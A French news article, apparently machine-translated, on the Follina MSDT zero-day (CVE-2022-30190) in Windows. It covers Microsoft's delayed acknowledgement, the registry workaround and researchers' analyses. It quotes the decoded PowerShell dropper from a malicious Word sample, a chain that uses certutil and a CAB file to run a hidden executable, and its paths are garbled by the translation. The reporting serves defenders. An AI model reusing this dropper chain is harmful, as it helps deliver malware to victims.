Une exécution de code critique zero-day dans toutes les versions prises en charge de Windows fait l’objet d’un exploit actif depuis sept semaines, offrant aux attaquants un moyen fiable d’installer des logiciels malveillants sans déclencher Windows Defender et une liste d’autres produits de protection des terminaux.
La vulnérabilité de Microsoft Support Diagnostic Tool a été signalée à Microsoft le 12 avril comme un jour zéro qui était déjà exploité dans la nature, ont déclaré des chercheurs du Shadow Chaser Group sur Twitter. Une réponse datée du 21 avril a toutefois informé les chercheurs que l’équipe du Microsoft Security Response Center ne considérait pas le comportement signalé comme une vulnérabilité de sécurité car, soi-disant, l’outil de diagnostic MSDT nécessitait un mot de passe avant d’exécuter les charges utiles.
Euh, tant pis
Lundi, Microsoft a fait marche arrière, identifiant le comportement avec le tracker de vulnérabilité CVE-2022-30190 et avertissant pour la première fois que le comportement signalé constituait après tout une vulnérabilité critique.
“Une vulnérabilité d’exécution de code à distance existe lorsque MSDT est appelé à l’aide du protocole URL à partir d’une application appelante telle que Word”, indique l’avis. “Un attaquant qui réussit à exploiter cette vulnérabilité peut exécuter du code arbitraire avec les privilèges de l’application appelante. L’attaquant peut alors installer des programmes, afficher, modifier ou supprimer des données, ou créer de nouveaux comptes dans le contexte autorisé par les droits de l’utilisateur.”
Au moment de la publication de cette histoire, Microsoft n’avait pas encore publié de correctif. Au lieu de cela, il conseillait aux clients de désactiver le protocole URL MSDT en :
- Courir Invite de commandes comme Administrateur.
- Pour sauvegarder la clé de registre, exécutez la commande “reg export HKEY_CLASSES_ROOTms-msdt filename”
- Exécutez la commande “reg delete HKEY_CLASSES_ROOTms-msdt /f”
Bien qu’initialement manquée par Microsoft, la vulnérabilité a de nouveau été repérée lorsqu’un chercheur a identifié un document Word téléchargé sur VirusTotal vendredi qui exploitait le vecteur d’attaque jusqu’alors inconnu.
Selon l’analyse du chercheur Kevin Beaumont, le document utilise Word pour récupérer un fichier HTML à partir d’un serveur Web distant. Le document utilise ensuite le schéma d’URI MSProtocol pour charger et exécuter des commandes PowerShell.
Publicité
“Cela ne devrait pas être possible”, a écrit Beaumont.
Malheureusement, c’est possible.
Lorsque les commandes du document sont décodées, elles se traduisent par :
$cmd = “c:windowssystem32cmd.exe” ;
Start-Process $cmd -windowstyle hidden -ArgumentList “/c taskkill /f /im msdt.exe” ;
Start-Process $cmd -windowstyle hidden -ArgumentList “/c cd C:userspublic&&for /r
%temp% %i dans (05-2022-0438.rar) copiez %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb .EXE”;
Selon le chercheur John Hammond de la société de sécurité Huntress, le script :
- Démarre les fenêtres masquées pour :
- Tuez msdt.exe s’il est en cours d’exécution
- Parcourez les fichiers à l’intérieur d’un fichier RAR, à la recherche d’une chaîne Base64 pour un fichier CAB codé
- Stockez ce fichier CAB encodé en Base64 sous 1.t
- Décodez le fichier CAB encodé en Base64 à enregistrer sous 1.c
- Élargir le 1.c fichier CAB dans le répertoire courant, et enfin :
- Exécuter rgb.exe (vraisemblablement compressé dans le fichier CAB 1.c)
Beaumont a également attiré l’attention sur cet article académique qui, en août 2020, montrait comment utiliser MSDT pour exécuter du code. Cela suggère qu’il y a eu au moins une autre fois où l’équipe de sécurité de l’entreprise n’a pas saisi le potentiel d’exploitation malveillante de ce comportement.
Non, la vue protégée ne vous sauvera pas
Normalement, Word est configuré pour charger le contenu téléchargé à partir d’Internet dans ce qu’on appelle la vue protégée, un mode qui désactive les macros et autres fonctions potentiellement nuisibles. Pour des raisons qui ne sont pas claires, a déclaré Beaumont, si le document est chargé en tant que fichier au format RTF, il “s’exécute sans même ouvrir le document (via l’onglet d’aperçu dans l’Explorateur), sans parler de la vue protégée.
En d’autres termes, ont écrit les chercheurs de Huntress, le fichier RTF peut “déclencher l’invocation de cet exploit avec juste le volet de prévisualisation dans l’Explorateur Windows”. Ce faisant, “cela étend la gravité de cette menace non seulement en ‘simple clic’ à exploiter, mais potentiellement avec un déclencheur ‘zéro-clic'”.
Outre le document téléchargé sur VirusTotal vendredi, les chercheurs ont découvert un fichier Word séparé téléchargé le 12 avril qui exploite le même jour zéro.
Compte tenu de la gravité de cette vulnérabilité non corrigée, les organisations qui s’appuient sur Microsoft Office doivent étudier en profondeur la manière dont elle affecte leurs réseaux. La désactivation du protocole d’URL MSDT n’est pas susceptible de créer des perturbations majeures à court terme et éventuellement à long terme. Lors de l’enquête, du moins jusqu’à ce que Microsoft publie plus de détails et de conseils, les utilisateurs d’Office doivent désactiver complètement le protocole et accorder un examen supplémentaire à tous les documents téléchargés sur Internet.